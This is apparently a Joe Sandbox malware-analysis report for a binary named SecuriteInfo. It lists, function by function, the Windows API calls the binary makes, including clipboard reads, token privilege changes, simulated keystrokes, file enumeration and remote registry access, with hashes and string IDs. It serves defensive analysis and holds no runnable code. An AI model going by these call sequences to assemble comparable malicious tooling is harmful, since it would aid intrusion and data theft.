                              • Instruction Fuzzy Hash: 62113631204B059FE3309F15C888B66B7E9FF45764F10C92EE8AACAA50D7B1F945CB60
                              APIs
                              • __lock_file.LIBCMT ref: 008A4AD6
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2597487223-0
                              • Opcode ID: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                              • Instruction ID: 77f1670846e49f12499f92f79382e5f2c2f4767c71e9f43659501151c4c24dbf
                              • Opcode Fuzzy Hash: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                              • Instruction Fuzzy Hash: 85F0F431800209DFFF51AFB88C0639F3660FF42325F084114B414EA4D1CBB88921CF62
                              APIs
                              • FreeLibrary.KERNEL32(?,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884FDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 1ec26de9f5ce7856fa256814d8426dc4b1e2a90d972fd0190cefaade23ebdf5b
                              • Instruction ID: ceba0b1cf1c54a5b69a144d6c7e16af6ff6130f42797fa03d4d5873190ca4462
                              • Opcode Fuzzy Hash: 1ec26de9f5ce7856fa256814d8426dc4b1e2a90d972fd0190cefaade23ebdf5b
                              • Instruction Fuzzy Hash: 38F03072509712CFCB34AF64D494812BBE1FF153293209A3EE2D6C2A11CB329844DF40
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LongNamePath_memmove
                              • String ID:
                              • API String ID: 2514874351-0
                              • Opcode ID: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                              • Instruction ID: 9f7802f6e61f42cb898c992560f9fa3931322216d70243f548296ae21d8c0854
                              • Opcode Fuzzy Hash: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                              • Instruction Fuzzy Hash: 91E0CD379042285BCB20E65C9C05FFA77EDEF887A0F0401B5FC0CD7309D964AD818691
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __fread_nolock
                              • String ID:
                              • API String ID: 2638373210-0
                              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                              • Instruction ID: 955c26bd580cd69d5fc89b99fe78a29d61c66e078036cc17d01dec1604891ac9
                              • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                              • Instruction Fuzzy Hash: A9E092B0114B405FD7348A24D8107E373E0FB06315F00081CF2DAC3341EBA6B8818759
                              APIs
                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,008BE16B,?,?,00000000), ref: 00885DBF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                              • Instruction ID: 42362ae14654dc33df8ccccd1dc978e49bc84892af1af551c9b61a8d46ca79e1
                              • Opcode Fuzzy Hash: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                              • Instruction Fuzzy Hash: 31D0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27E509795
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                              • Instruction ID: 54902b93528b87b659f4caceff0803e9e4d065a73cd747424abd7c20d63ed2fd
                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                              • Instruction Fuzzy Hash: F5B092B684020C7BEE012E86EC02A593F19AB45678F808020FB0C18562A673A6A0968E
                              APIs
                              • GetLastError.KERNEL32(00000002,00000000), ref: 008ED46A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 1fd4c31e9805e92fc5a587dc3ab616abc1beb6e2f980fa2033f826362636e4ec
                              • Instruction ID: c2085e53de23332a74bb611ff7c4bec1c1d4c14e9a0cdd2606ca3bec4b80fe5e
                              • Opcode Fuzzy Hash: 1fd4c31e9805e92fc5a587dc3ab616abc1beb6e2f980fa2033f826362636e4ec
                              • Instruction Fuzzy Hash: 67714D342043418FC714EF29C491A6AB7E0FF99714F18496DF996DB2A2DB30ED49CB52
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 1dc9fdbf08c2d9f326ae3044a1ab10a9bfaaa91819811b2a15476d27f519fb32
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8231C270A00109DFEB18DF58D480969F7A6FF5A304B648AA5E409DBA51DB31EDE1EF80
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 011022B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction ID: f931c5b8dc9d55cedd3edb9f854ec474835180145e5cfe28180d0571506d2fd7
                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction Fuzzy Hash: 73E09A7494010EAFDB00EFE4D54969E7BB4EF04311F1005A1FD0597681DB709A548A62
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 011022B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: c209ea3b4fa66068eb840c2828d35899acafba7577eeb4e41c8624a87a828362
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: 33E0BF7494010E9FDB00EFE4D54969E7BB4EF04301F100161FD0592281D77099508A62
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0090CE50
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CE91
                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0090CED6
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CF00
                              • SendMessageW.USER32 ref: 0090CF29
                              • _wcsncpy.LIBCMT ref: 0090CFA1
                              • GetKeyState.USER32(00000011), ref: 0090CFC2
                              • GetKeyState.USER32(00000009), ref: 0090CFCF
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CFE5
                              • GetKeyState.USER32(00000010), ref: 0090CFEF
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090D018
                              • SendMessageW.USER32 ref: 0090D03F
                              • SendMessageW.USER32(?,00001030,?,0090B602), ref: 0090D145
                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0090D15B
                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0090D16E
                              • SetCapture.USER32(?), ref: 0090D177
                              • ClientToScreen.USER32(?,?), ref: 0090D1DC
                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0090D1E9
                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0090D203
                              • ReleaseCapture.USER32 ref: 0090D20E
                              • GetCursorPos.USER32(?), ref: 0090D248
                              • ScreenToClient.USER32(?,?), ref: 0090D255
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D2B1
                              • SendMessageW.USER32 ref: 0090D2DF
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D31C
                              • SendMessageW.USER32 ref: 0090D34B
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0090D36C
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090D37B
                              • GetCursorPos.USER32(?), ref: 0090D39B
                              • ScreenToClient.USER32(?,?), ref: 0090D3A8
                              • GetParent.USER32(?), ref: 0090D3C8
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D431
                              • SendMessageW.USER32 ref: 0090D462
                              • ClientToScreen.USER32(?,?), ref: 0090D4C0
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090D4F0
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D51A
                              • SendMessageW.USER32 ref: 0090D53D
                              • ClientToScreen.USER32(?,?), ref: 0090D58F
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0090D5C3
                                • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090D65F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3977979337-4164748364
                              • Opcode ID: da8babe1136a6eaece14ba470a6512429ebeeb45744e49f8d6cb6b95607bff69
                              • Instruction ID: ef9134f9abb4c47caf73846163af60fb6fa9c83f9293f07a489f6efe115eb17b
                              • Opcode Fuzzy Hash: da8babe1136a6eaece14ba470a6512429ebeeb45744e49f8d6cb6b95607bff69
                              • Instruction Fuzzy Hash: 5942ABB4208341AFD725CF68C858EAABBE9FF49314F14061DF699972E0C731AD41DB92
                              APIs
                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0090873F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: %d/%02d/%02d
                              • API String ID: 3850602802-328681919
                              • Opcode ID: 89836121b4f0f278d0aea76d2d7a654b6dc62f67e22583b3ec1888cff907bd86
                              • Instruction ID: eafe5ce91a01892d6a5014e01d999a71ab0cd322ca33a3fdee66eb834fb81bd6
                              • Opcode Fuzzy Hash: 89836121b4f0f278d0aea76d2d7a654b6dc62f67e22583b3ec1888cff907bd86
                              • Instruction Fuzzy Hash: 6512BD71604208AFEB258F28CC49FAF7BB8EF49710F204569F995EA2E1DF748941DB10
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$_memset
                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                              • API String ID: 1357608183-1798697756
                              • Opcode ID: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                              • Instruction ID: 66eb76c487330a0750d50357f48e998a98601f9afd1ad1088e9db0f26489ab5b
                              • Opcode Fuzzy Hash: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                              • Instruction Fuzzy Hash: 6B938171A04219DBDF24DF58D881BADB7B1FF58714F24826AE955EB380E7709E81CB40
                              APIs
                              • GetForegroundWindow.USER32(00000000,?), ref: 00884A3D
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008BDA8E
                              • IsIconic.USER32(?), ref: 008BDA97
                              • ShowWindow.USER32(?,00000009), ref: 008BDAA4
                              • SetForegroundWindow.USER32(?), ref: 008BDAAE
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008BDAC4
                              • GetCurrentThreadId.KERNEL32 ref: 008BDACB
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BDAD7
                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAE8
                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAF0
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 008BDAF8
                              • SetForegroundWindow.USER32(?), ref: 008BDAFB
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB10
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB1B
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB25
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB2A
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB33
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB38
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB42
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB47
                              • SetForegroundWindow.USER32(?), ref: 008BDB4A
                              • AttachThreadInput.USER32(?,?,00000000), ref: 008BDB71
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 4125248594-2988720461
                              • Opcode ID: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                              • Instruction ID: 88758fc1e951f05b0a54820d3ea046e072891ba15a1df00319ae1a61bd539efd
                              • Opcode Fuzzy Hash: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                              • Instruction Fuzzy Hash: FF317371A5431CBFEB316FA19C49FBE7E6CEB44B60F114025FA04EA1D1D6B15A00BBA0
                              APIs
                                • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                              • _memset.LIBCMT ref: 008D889B
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D88ED
                              • CloseHandle.KERNEL32(?), ref: 008D88FE
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D8915
                              • GetProcessWindowStation.USER32 ref: 008D892E
                              • SetProcessWindowStation.USER32(00000000), ref: 008D8938
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D8952
                                • Part of subcall function 008D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                                • Part of subcall function 008D8713: CloseHandle.KERNEL32(?,?,008D8851), ref: 008D873A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                              • String ID: $default$winsta0
                              • API String ID: 2063423040-1027155976
                              • Opcode ID: e29d2cd7a66cfe1f0a70739a7502b03307366bd56de70b6dc8dbefc2671a10c0
                              • Instruction ID: 3d4f9b3e4906a60fd7efaa56eee893e41fefb9867025554157500de6ccc69ab5
                              • Opcode Fuzzy Hash: e29d2cd7a66cfe1f0a70739a7502b03307366bd56de70b6dc8dbefc2671a10c0
                              • Instruction Fuzzy Hash: D5814A71900219EFDF21DFA4DC45AEEBBB8FF04314F08426AF910E6261DB718E149B62
                              APIs
                              • OpenClipboard.USER32(0090F910), ref: 008F4284
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 008F4292
                              • GetClipboardData.USER32(0000000D), ref: 008F429A
                              • CloseClipboard.USER32 ref: 008F42A6
                              • GlobalLock.KERNEL32(00000000), ref: 008F42C2
                              • CloseClipboard.USER32 ref: 008F42CC
                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008F42E1
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 008F42EE
                              • GetClipboardData.USER32(00000001), ref: 008F42F6
                              • GlobalLock.KERNEL32(00000000), ref: 008F4303
                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 008F4337
                              • CloseClipboard.USER32 ref: 008F4447
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                              • String ID:
                              • API String ID: 3222323430-0
                              • Opcode ID: 107f6275f348b8cdb9257e184f07272f825cfb545d5268c135344c996b23125d
                              • Instruction ID: bf2fcffdc5052a9779fd581b26f62b7a30598ec8c738f331654d52c77ba4e19b
                              • Opcode Fuzzy Hash: 107f6275f348b8cdb9257e184f07272f825cfb545d5268c135344c996b23125d
                              • Instruction Fuzzy Hash: FC518E35208209AFD310FB68DC95F7F77A8FF84B10F10452AF696D22A1DB71DA059B62
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 008EC9F8
                              • FindClose.KERNEL32(00000000), ref: 008ECA4C
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA71
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA88
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 008ECAAF
                              • __swprintf.LIBCMT ref: 008ECAFB
                              • __swprintf.LIBCMT ref: 008ECB3E
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • __swprintf.LIBCMT ref: 008ECB92
                                • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                              • __swprintf.LIBCMT ref: 008ECBE0
                                • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A3953
                                • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A396B
                              • __swprintf.LIBCMT ref: 008ECC2F
                              • __swprintf.LIBCMT ref: 008ECC7E
                              • __swprintf.LIBCMT ref: 008ECCCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 3953360268-2428617273
                              • Opcode ID: b469574daabcb05dd4b422828e3e6a332d8514693bfba33af3dc91cd06f0dd7f
                              • Instruction ID: 789289d480e1ba0fc53c9a73f44b0f035655bfa318f50eb65e0170084dfa0b95
                              • Opcode Fuzzy Hash: b469574daabcb05dd4b422828e3e6a332d8514693bfba33af3dc91cd06f0dd7f
                              • Instruction Fuzzy Hash: 6FA13AB2508314ABC714FBA8C885DAFB7ECFF94704F440929F586C2191EA34DA09CB63
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EF221
                              • _wcscmp.LIBCMT ref: 008EF236
                              • _wcscmp.LIBCMT ref: 008EF24D
                              • GetFileAttributesW.KERNEL32(?), ref: 008EF25F
                              • SetFileAttributesW.KERNEL32(?,?), ref: 008EF279
                              • FindNextFileW.KERNEL32(00000000,?), ref: 008EF291
                              • FindClose.KERNEL32(00000000), ref: 008EF29C
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF2B8
                              • _wcscmp.LIBCMT ref: 008EF2DF
                              • _wcscmp.LIBCMT ref: 008EF2F6
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF308
                              • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF326
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF330
                              • FindClose.KERNEL32(00000000), ref: 008EF33D
                              • FindClose.KERNEL32(00000000), ref: 008EF34F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1803514871-438819550
                              • Opcode ID: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                              • Instruction ID: 37daaf446db4afe04e9dcbe9cc1cc04075d321c273b6ba6a10aacc15858e4473
                              • Opcode Fuzzy Hash: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                              • Instruction Fuzzy Hash: 5931AE766002596EDB20DBA5DC58ADE73ACEF4A360F100176FA14D31A1EB30DB85DB50
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900BDE
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0090F910,00000000,?,00000000,?,?), ref: 00900C4C
